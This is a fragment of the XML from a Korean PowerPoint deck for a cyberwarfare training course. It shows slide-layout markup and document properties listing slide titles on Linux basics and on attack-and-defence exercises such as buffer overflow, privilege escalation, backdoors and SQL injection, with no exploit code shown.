        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11F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화살표: 오른쪽 15">
            <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3BBF55D-9530-477E-B322-C490450DF560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517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604498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/Appendix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부록</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="화살표: 오른쪽 2">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68952EE9-EA36-40D6-8579-506BFF052086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580445" y="2997643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4863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rId2" action="ppaction://hlinksldjump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690734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0C7EC-4675-437A-81A0-1A0D6E970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81754A-2693-4C28-A299-E5432694E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dirty="0"/>
              <a:t>󰏮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5459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yber security concept Premium Vector">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D09DF66-D0B0-42FF-8655-B77E663ED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1443038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155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2287</TotalTime>
  <Words>8707</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>2351</Paragraphs>
  <Slides>95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1" baseType="lpstr">
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕 Semilight</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>사이버전실습</vt:lpstr>
      <vt:lpstr>/  목  차</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  해킹 시연</vt:lpstr>
      <vt:lpstr>/Intro  해킹 관련 영상</vt:lpstr>
      <vt:lpstr>/Theory  이론</vt:lpstr>
      <vt:lpstr>/Theory/T1   사이버전 실습체계 구조</vt:lpstr>
      <vt:lpstr>/Theory/T1   단위과제 기반 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   시나리오 기반 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   공격&amp;방어 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   체계 구성도</vt:lpstr>
      <vt:lpstr>/Theory/T2   리눅스 기본 명령어</vt:lpstr>
      <vt:lpstr>/Theory/T2/1  # pwd</vt:lpstr>
      <vt:lpstr>/Theory/T2/2  # cd</vt:lpstr>
      <vt:lpstr>/Theory/T2/3  # ls</vt:lpstr>
      <vt:lpstr>/Theory/T2/4  리눅스 기본 명령어 – cp</vt:lpstr>
      <vt:lpstr>/Training  실습체계</vt:lpstr>
      <vt:lpstr>/Training/Unit  단위과제</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys  시스템 문제 리스트</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/0  0. 실습 구성도</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/1  1. 파일 접근 권한 설정</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/2  2. 시스템 로그 점검</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/3  3. R-명령어 제한</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/4  4. 계정 원격 접속 탐지</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/5  5. 계정 우회 접속 탐지</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/6  6. 파일 접근 권한 설정</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/7  7. FTP 서비스 설정</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF - 힙</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF – 힙 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/11  11. Format String 공격 및 방어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/Training/Unit/Sys/11  11. Format String 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/12  12. 권한상승 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/12  12. 권한상승 공격 및 방어- 대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/13  13. 백도어 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/13  13. 백도어 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/14  14. 비인가 접근 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/14  14. 비인가 접근 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net  네트워크 문제 리스트</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/0  0. 실습 구성도</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/1  1. NIS(+) 서비스 제한</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web  웹 문제 리스트</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web  0. 실습 구성도</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/1  1. SQL Injection 공격/방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Appendix  부록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사이버전실습</dc:title>
  <dc:creator>arizona95</dc:creator>
  <cp:lastModifiedBy>arizona95</cp:lastModifiedBy>
  <cp:revision>125</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-19T02:37:28Z</dcterms:modified>
</cp:coreProperties>
</file>